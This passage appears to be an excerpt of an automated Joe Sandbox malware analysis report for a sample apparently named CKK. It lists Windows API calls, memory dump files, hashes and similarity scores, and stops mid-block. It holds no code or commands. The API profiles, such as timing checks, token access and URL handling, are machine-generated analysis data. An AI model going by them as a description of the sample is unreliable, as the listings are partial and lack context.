                                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00A5ACD3,?,00008000), ref: 00A5B0C4
                                                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00A5ACD3,?,00008000), ref: 00A5B0E9
                                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00A5ACD3,?,00008000), ref: 00A5B0F3
                                                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00A5ACD3,?,00008000), ref: 00A5B126
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: CounterPerformanceQuerySleep
                                                                                              • String ID:
                                                                                              • API String ID: 2875609808-0
                                                                                              • Opcode ID: 3c2a78b38117fb5bbd7c94b7b19f9dc05194f0044b2d6de49139019515a889cc
                                                                                              • Instruction ID: 1d47446cea6b6e14146fac469d0c4b6a23c328582f8ee176998b006f20df80ab
                                                                                              • Opcode Fuzzy Hash: 3c2a78b38117fb5bbd7c94b7b19f9dc05194f0044b2d6de49139019515a889cc
                                                                                              • Instruction Fuzzy Hash: 47115B31C1192CEBCF00EFE9E9986EEBB78FF09722F104685E941B2185CB3056558B61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00A52DC5
                                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 00A52DD6
                                                                                              • GetCurrentThreadId.KERNEL32(00000000,?,00000000,00000000), ref: 00A52DDD
                                                                                              • AttachThreadInput.USER32(00000000,?,00000000), ref: 00A52DE4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2710830443-0
                                                                                              • Opcode ID: a02acddd6aebb1bcd48b64553b9e322bcc65a36ab2cee81fbbe3b6476f171d9c
                                                                                              • Instruction ID: 62aed3e8c6ea73301159384ba6b7a6b308b743f27394194e89d8f2969ce5e765
                                                                                              • Opcode Fuzzy Hash: a02acddd6aebb1bcd48b64553b9e322bcc65a36ab2cee81fbbe3b6476f171d9c
                                                                                              • Instruction Fuzzy Hash: 4DE06D721012247AD7205BA2AC0DFEB7E6CFB43BB2F001125B905D1080AAB48946CBB0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00A09639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 00A09693
                                                                                                • Part of subcall function 00A09639: SelectObject.GDI32(?,00000000), ref: 00A096A2
                                                                                                • Part of subcall function 00A09639: BeginPath.GDI32(?), ref: 00A096B9
                                                                                                • Part of subcall function 00A09639: SelectObject.GDI32(?,00000000), ref: 00A096E2
                                                                                              • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00A88887
                                                                                              • LineTo.GDI32(?,?,?), ref: 00A88894
                                                                                              • EndPath.GDI32(?), ref: 00A888A4
                                                                                              • StrokePath.GDI32(?), ref: 00A888B2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                              • String ID:
                                                                                              • API String ID: 1539411459-0
                                                                                              • Opcode ID: 508b0e92b11010d5f13071b035374b10c98016dd78387a1de4563f1c8dbe821b
                                                                                              • Instruction ID: a44d4d1bd6c93f5b76d80d5be8ea3c85a6f4f5609c05c7b9ef04fcc04454a4cd
                                                                                              • Opcode Fuzzy Hash: 508b0e92b11010d5f13071b035374b10c98016dd78387a1de4563f1c8dbe821b
                                                                                              • Instruction Fuzzy Hash: 88F0DA36145259BADB12AFD4AC09FCA3A69AF06360F448100FA11650E2CBB95552DFA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Color$ModeObjectStockText
                                                                                              • String ID:
                                                                                              • API String ID: 4037423528-0
                                                                                              • Opcode ID: 9b3b7434bb79d23baa16c1f52d77ffbe2caed52247501b16179be064c6c20e97
                                                                                              • Instruction ID: 047266ad3c7c8aed716774ece636707bb034e7093795ce5110ab586db14ec340
                                                                                              • Opcode Fuzzy Hash: 9b3b7434bb79d23baa16c1f52d77ffbe2caed52247501b16179be064c6c20e97
                                                                                              • Instruction Fuzzy Hash: 46E06D31244284AEDB219BB4BC0DBED3F20AB52376F04831AF6FA580E1C37146419F21
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetCurrentThread.KERNEL32(00000028,00000000,?,00000000,00A51089,?,?,?,00A511D9), ref: 00A51634
                                                                                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,00A511D9), ref: 00A5163B
                                                                                              • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00A511D9), ref: 00A51648
                                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,00A511D9), ref: 00A5164F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentOpenProcessThreadToken
                                                                                              • String ID:
                                                                                              • API String ID: 3974789173-0
                                                                                              • Opcode ID: fe1058164c1c00ff3f63cec6e46071f6f1a77576c82fe47f102ca991adf1a5bc
                                                                                              • Instruction ID: 0f1f525b42d18ddc852c6431fa3235e7e964a237deee35279796c8052ddf8ebc
                                                                                              • Opcode Fuzzy Hash: fe1058164c1c00ff3f63cec6e46071f6f1a77576c82fe47f102ca991adf1a5bc
                                                                                              • Instruction Fuzzy Hash: B8E04632602211ABD7206BF0AE0DB963B78AF557A6F158808F645C9080E63485468B60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetDesktopWindow.USER32 ref: 00A4D858
                                                                                              • GetDC.USER32(00000000), ref: 00A4D862
                                                                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00A4D882
                                                                                              • ReleaseDC.USER32(?), ref: 00A4D8A3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2889604237-0
                                                                                              • Opcode ID: ed6dd8dca8840fc9dcfefb9fbfbb471acbe4d9cf704ac1643cc45b68e179e6c7
                                                                                              • Instruction ID: 5b7a29867d5001378c808069448144aa8264b308fee23cd0883ee7d2e32a7f6b
                                                                                              • Opcode Fuzzy Hash: ed6dd8dca8840fc9dcfefb9fbfbb471acbe4d9cf704ac1643cc45b68e179e6c7
                                                                                              • Instruction Fuzzy Hash: 10E09AB5800209DFCB41DFF0E90866DFBB5FB48321F149469E946E7250D7385942AF60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetDesktopWindow.USER32 ref: 00A4D86C
                                                                                              • GetDC.USER32(00000000), ref: 00A4D876
                                                                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00A4D882
                                                                                              • ReleaseDC.USER32(?), ref: 00A4D8A3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2889604237-0
                                                                                              • Opcode ID: af42e7aa76e2d4a060c179a30167e72a7b58f5303a70f03c577368494c359f4c
                                                                                              • Instruction ID: 97d50c25eac6fe6e2f0f3b6fd80587e8136dc029f513a3e47acf26aa69ab4336
                                                                                              • Opcode Fuzzy Hash: af42e7aa76e2d4a060c179a30167e72a7b58f5303a70f03c577368494c359f4c
                                                                                              • Instruction Fuzzy Hash: E2E092B5800209EFCB51EFF0E90866DBBB5BB48321B149469E94AE7250DB385902AF60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 009F7620: _wcslen.LIBCMT ref: 009F7625
                                                                                              • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00A64ED4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Connection_wcslen
                                                                                              • String ID: *$LPT
                                                                                              • API String ID: 1725874428-3443410124
                                                                                              • Opcode ID: 77886bba67edbeacc988962331cb4ec31473914445a4a5ee30b4a1e3d274d100
                                                                                              • Instruction ID: 81bffa2df91810d90e4fc763111c3fd96711b7e100754d732bebe9dbbbcffd83
                                                                                              • Opcode Fuzzy Hash: 77886bba67edbeacc988962331cb4ec31473914445a4a5ee30b4a1e3d274d100
                                                                                              • Instruction Fuzzy Hash: 53915075A00204EFCB14DF58C484EAABBF5BF48704F198099E80A9F3A2D775ED85CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • __startOneArgErrorHandling.LIBCMT ref: 00A1E30D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorHandling__start
                                                                                              • String ID: pow
                                                                                              • API String ID: 3213639722-2276729525
                                                                                              • Opcode ID: c3f5baac0fbb2989a98d919976a012c823859ee07cc9a14ed22b211edd0b8893
                                                                                              • Instruction ID: edd112be2d7dc266649b8ca40cde220ef38ca2001dd24f1e7c7e6f08084dc50b
                                                                                              • Opcode Fuzzy Hash: c3f5baac0fbb2989a98d919976a012c823859ee07cc9a14ed22b211edd0b8893
                                                                                              • Instruction Fuzzy Hash: B9519E71A0C21296CB15F72CDA017FE3BA4AB40740F3449B9E8E6462E9DF358DD29B46
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: #
                                                                                              • API String ID: 0-1885708031
                                                                                              • Opcode ID: 946bf4ed413f64b854373e4484f6d85b3afe6f5f8a9a8983bb6f78991b9d5a15
                                                                                              • Instruction ID: ce4c86cc4e9ff30dc81fc78fdd9204b2bd36d51c6c36294be99da892b441de8d
                                                                                              • Opcode Fuzzy Hash: 946bf4ed413f64b854373e4484f6d85b3afe6f5f8a9a8983bb6f78991b9d5a15
                                                                                              • Instruction Fuzzy Hash: 0751343990024ADFDF15DF68D481AFA7BA8FFA9320F244459E8919B2D0D7349D42DBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • Sleep.KERNEL32(00000000), ref: 00A0F2A2
                                                                                              • GlobalMemoryStatusEx.KERNEL32(?), ref: 00A0F2BB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: GlobalMemorySleepStatus
                                                                                              • String ID: @
                                                                                              • API String ID: 2783356886-2766056989
                                                                                              • Opcode ID: e7c24f5935947ca803e43ccd7b762369a428da4d57f0236d1b7e800f9075dba1
                                                                                              • Instruction ID: d6bce566176db6693390c5bf783d1ade49c3a48f8f03d4f0e0c2e1d5ffc3525c
                                                                                              • Opcode Fuzzy Hash: e7c24f5935947ca803e43ccd7b762369a428da4d57f0236d1b7e800f9075dba1
                                                                                              • Instruction Fuzzy Hash: CD5127714087499BD320EF54D886BABFBF8FFC5310F81885DF29941195EB708929CB66
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: BuffCharUpper_wcslen
                                                                                              • String ID: CALLARGARRAY
                                                                                              • API String ID: 157775604-1150593374
                                                                                              • Opcode ID: 940825073cd4791a19683142ecb6de9ceea1d2bb6ba6e2fded0cebd35654c1bf
                                                                                              • Instruction ID: a9178c8e7042fdb7e906bd7b24e60bc4e7f8f1f999ad57e7d64f731ed51c0527
                                                                                              • Opcode Fuzzy Hash: 940825073cd4791a19683142ecb6de9ceea1d2bb6ba6e2fded0cebd35654c1bf
                                                                                              • Instruction Fuzzy Hash: CA418071E001099FCB14DFB9C9819BEBBB5FF59320F108069E509A7292E7709D81DBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 00A6D130
                                                                                              • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00A6D13A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: CrackInternet_wcslen
                                                                                              • String ID: |
                                                                                              • API String ID: 596671847-2343686810
                                                                                              • Opcode ID: f6c9cdd9a7c4e7f591cb61238340db4fd0ad53a750904e5482898dfc004e0601
                                                                                              • Instruction ID: 7ce87a6ccf708e9ca3f68dd4218bb50bfe44a60eb17567dfe6ca3487f23c9580
                                                                                              • Opcode Fuzzy Hash: f6c9cdd9a7c4e7f591cb61238340db4fd0ad53a750904e5482898dfc004e0601
                                                                                              • Instruction Fuzzy Hash: 8A313B71D00209ABCF15EFA5CC85AEEBFB9FF45340F000119F919A6162E775AA56CB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • DestroyWindow.USER32 ref: 00A83621
                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00A8365C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$DestroyMove
                                                                                              • String ID: static
                                                                                              • API String ID: 2139405536-2160076837
                                                                                              • Opcode ID: c6eab532a7a076df0db6cc32ef6f65354739f27699d62f2eefedccc55842442b
                                                                                              • Instruction ID: 1b9722630e38481f346d9d92febc5afff9f10f79d58e6904054be6531fc3ccdd
                                                                                              • Opcode Fuzzy Hash: c6eab532a7a076df0db6cc32ef6f65354739f27699d62f2eefedccc55842442b
                                                                                              • Instruction Fuzzy Hash: 42319272110604AEDB14EF68DC40FFB73A9FF88720F109619F95597180DB30AD91C760
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00A8461F
                                                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00A84634
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID: '
                                                                                              • API String ID: 3850602802-1997036262
                                                                                              • Opcode ID: 24213e9cf3a2846ac1df9db4ee028b9f1318807ed2b78bda6d2a33dc41d35f37
                                                                                              • Instruction ID: 95569065bac442d6f6c91781946f3073c2674c44b286d78d9a3beacfc1fb1aaa
                                                                                              • Opcode Fuzzy Hash: 24213e9cf3a2846ac1df9db4ee028b9f1318807ed2b78bda6d2a33dc41d35f37
                                                                                              • Instruction Fuzzy Hash: CA31F874A0130A9FDB14DFA9C991BDE7BB5FF49300F14406AE905AB351E770A941CF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00A333A2
                                                                                                • Part of subcall function 009F6B57: _wcslen.LIBCMT ref: 009F6B6A
                                                                                              • Shell_NotifyIconW.SHELL32(00000001,?), ref: 009F3A04
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: IconLoadNotifyShell_String_wcslen
                                                                                              • String ID: Line:
                                                                                              • API String ID: 2289894680-1585850449
                                                                                              • Opcode ID: 679a1b0236f1c367387d86f1e97675af2568131ccae7b830b588991c825243eb
                                                                                              • Instruction ID: 39035dc9b8264ea5cbcc8ab8b0590b87c97fdff88280806fc969f130487476c5
                                                                                              • Opcode Fuzzy Hash: 679a1b0236f1c367387d86f1e97675af2568131ccae7b830b588991c825243eb
                                                                                              • Instruction Fuzzy Hash: B831F871508308AAD721EB60DC45FFB77D8AB81314F00892EF69987191DBB89A45C7C2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00A8327C
                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00A83287
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
